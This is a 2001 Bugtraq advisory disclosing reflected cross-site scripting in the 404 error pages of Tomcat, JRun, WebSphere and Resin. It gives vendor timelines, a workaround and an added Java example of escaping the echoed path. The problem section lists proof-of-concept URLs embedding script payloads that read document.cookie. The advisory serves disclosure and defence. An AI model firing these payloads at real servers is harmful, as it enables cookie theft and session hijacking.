Bugtraq: Java servlet cross-site scripting vulnerability
Jul 2, 2001, 16:43 UTC

Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================

Affected products:
=================
  Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
     <http://jakarta.apache.org/tomcat/>
  JRun 3.0
     <http://www.allaire.com/products/jrun/index.cfm>
  WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
     <http://www-4.ibm.com/software/webservers/>
  Resin
     <http://www.caucho.com/products/resin/>


Not affected:
============
  Unknown


Problem:
=======
  When any of the following URLs is accessed, the JavaScript code is
  executed in the browser in the context of the server's domain.

  Tomcat 3.2.1:
    http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  JRun 3.0:
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
  WebSphere 3.5 FP2:
    http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
  WebSphere 3.02:
    http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  VisualAge for Java 3.5 Professional:
    http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
  Resin 1.2.2:
    http://Resin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

  These pages produce output like this:
  =================================================
  Error 404
  An error has occurred while processing request:
  http://WebSphere/webapp/examples/******
 
  Message: File not found: file://******
  StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
          at javax.servlet.ServletException.<init>(ServletException.java:107)
          at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
          at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
          at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
          ...
  =================================================
  ******: The JavaScript code is executed here.

  This vulnerability is quite similar to "IIS cross-site scripting
  vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
  <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>


Impact:
======
  For details about cross-site scripting, see the following pages.
  <http://www.cert.org/advisories/CA-2000-02.html>
  <http://www.microsoft.com/TechNet/security/crssite.asp>
  <http://www.apache.org/info/css-security/>


Vendor status:
=============

  Tomcat:
  ======
    Notified:
      16 Mar 2001 04:32:02 +0900
      17 Mar 2001 18:55:45 +0900
    Response:
      17 Mar 2001 20:07:42 -0000
    Fix:
      30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
      11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
    Announcement:
      <http://jakarta.apache.org/tomcat/news.html>

      Sun Microsystems does not publish Tomcat vulnerabilities.
      <http://java.sun.com/products/jsp/tomcat/>
      <http://java.sun.com/sfaq/chronology.html>

  JRun:
  ====
    Notified:
      13 Mar 2001 23:11:54 +0900
    Response:
      13 Mar 2001 09:43:49 -0500
      14 Mar 2001 09:05:03 -0500
    Fix:
      28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
    Announcement:
      <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
      Macromedia Product Security Bulletin (MPSB01-06)
      JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
      (a.k.a. JavaScript code execution vulnerability)

  WebSphere:
  =========
    Notified:
      20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
    Response:
      22 Mar 2001 09:14:01 -0500
      23 Mar 2001 00:02:58 +0900
    Fix:
      PQ47386V302x (?)
      <http://www-4.ibm.com/software/webservers/appserv/efix.html>
    Announcement:
      <http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
      (in Japanese)

  Resin:
  =====
    Notified:
      16 Mar 2001 02:26:47 +0900
    Response:
      None
    Fix:
      Unknown
    Announcement:
      Unknown
      <http://www.caucho.com/products/resin/changes.xtp>

Workaround:
==========
  Customize error pages.


--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/
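
The "Customize error pages" workaround is effective because the default 404 page writes the requested path into HTML unescaped. As an added example (not from the advisory or any vendor's code), this stand-alone Java program models that error page beside a customized one that HTML-escapes the path; the class and method names are hypothetical, and the request paths are constructed from the WebSphere URL in the advisory.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;

// Added example: a model of a container's 404 page, not vendor code.
public class ErrorPageDemo {

    // Replace the five HTML-significant characters with entities.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Behaviour the advisory describes: the requested path is echoed verbatim.
    static String render404Unsafe(String path) {
        return "<html><body><h1>Error 404</h1>\n"
             + "<p>File not found: " + path + "</p></body></html>";
    }

    // Customized error page: same message, path escaped before it reaches HTML.
    static String render404Safe(String path) {
        return "<html><body><h1>Error 404</h1>\n"
             + "<p>File not found: " + escapeHtml(path) + "</p></body></html>";
    }

    public static void main(String[] args) throws UnsupportedEncodingException {
        // Constructed sample requests using the path from the advisory; the
        // second is the same path percent-encoded, as a browser may send it.
        String[] rawPaths = {
            "/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>",
            "/webapp/examples/%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E"
        };
        for (String raw : rawPaths) {
            // Assumption of this model: the path is decoded before it is echoed.
            String path = URLDecoder.decode(raw, "UTF-8");
            System.out.println("unsafe: " + render404Unsafe(path));
            System.out.println("safe:   " + render404Safe(path));
        }
    }
}
```

Both inputs produce the same output, so escaping has to be applied to the decoded value that is actually written to the page. A custom error page that does not echo the request at all avoids the problem entirely.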


Talkback(s):

  It doesn't work with my Tomcat 3.2.1 (Jul 3, 2001, 03:43:57)
    See subject: I just tested this exploit and it doesn't work. I get "Forbidde ...

  Not-Affected : orion (Jul 6, 2001, 06:06:12)
    http://www.orionserver.com/ alert(document.cookie) .jsp gives the following outpu ...

  how to use servlets,jsp,beans,ejb with apache not tomcat. (Jul 29, 2001, 16:10:11)
    hi! i've been using tomcat to run my servlets, jsp and beans. i'm pretty c ...

  Jserv Affected? (Aug 24, 2001, 16:22:55)
    Is Jserv affected? Or do you have to run JSP? Ben Ricker ...